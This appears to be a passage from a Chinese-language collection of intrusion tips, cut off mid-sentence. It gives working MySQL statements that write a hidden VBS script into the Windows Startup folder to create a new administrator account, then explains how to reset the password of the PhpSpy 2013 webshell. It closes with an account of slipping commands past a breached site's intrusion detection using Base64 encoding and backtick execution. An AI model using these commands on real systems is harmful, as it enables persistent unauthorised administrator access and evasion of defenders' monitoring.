当然,条件也十分苛刻:
如果你的Webshell有足够的权限,能在用户启动目录里面写入文件
耐心地等待管理员开启机子
没开杀毒软件
12. 我们利用Mysql来outfile出vbs脚本:
create table a(cmd text);
insert into a values ("set wshshell=createobject(""wscript.shell"")");
insert into a values ("a=wshshell.run(""cmd.exe /c net user user password /add"",0)");
insert into a values ("a=wshshell.run(""cmd.exe /c net localgroup administrators user /add"",0)");
select * from a into outfile "c:\\docume~1\\alluse~1\\[开始]菜单\\程序\\启动\\a.vbs";
说明
insert into a values ("a=wshshell.run(""cmd.exe /c net user user password /add"",0)");
里面的“0”意思是不弹出CMD窗口,安静地运行。
PhpSpy 2013 密码修改
将加密函数:
function encode_pass($pass) {
$k = 'angel';
$pass = md5($k.$pass);
$pass = md5($pass.$k);
$pass = md5($k.$pass.$k);
return $pass;
最后一行:
return $pass; 修改为 echo $pass;
在Login框登陆输入你的密码,即可输出加密好的密码。
然后在PhpSpy 2013里修改 $pass的值 就可以了。
13. 真实案例:渗透某站后发现对方规则较变态,比如执行id,uname-a,等便可判断为入
侵。
想了下,通过Base64编码绕过
命令写入文件的方式实现绕过(实际运用中要能上传或者写入文件
还有其他很多方法,即使不能上传文件,也可以自己’因地制宜’, 借到执行命令的字符后反单引号执行。用的方法是
linux Shell expr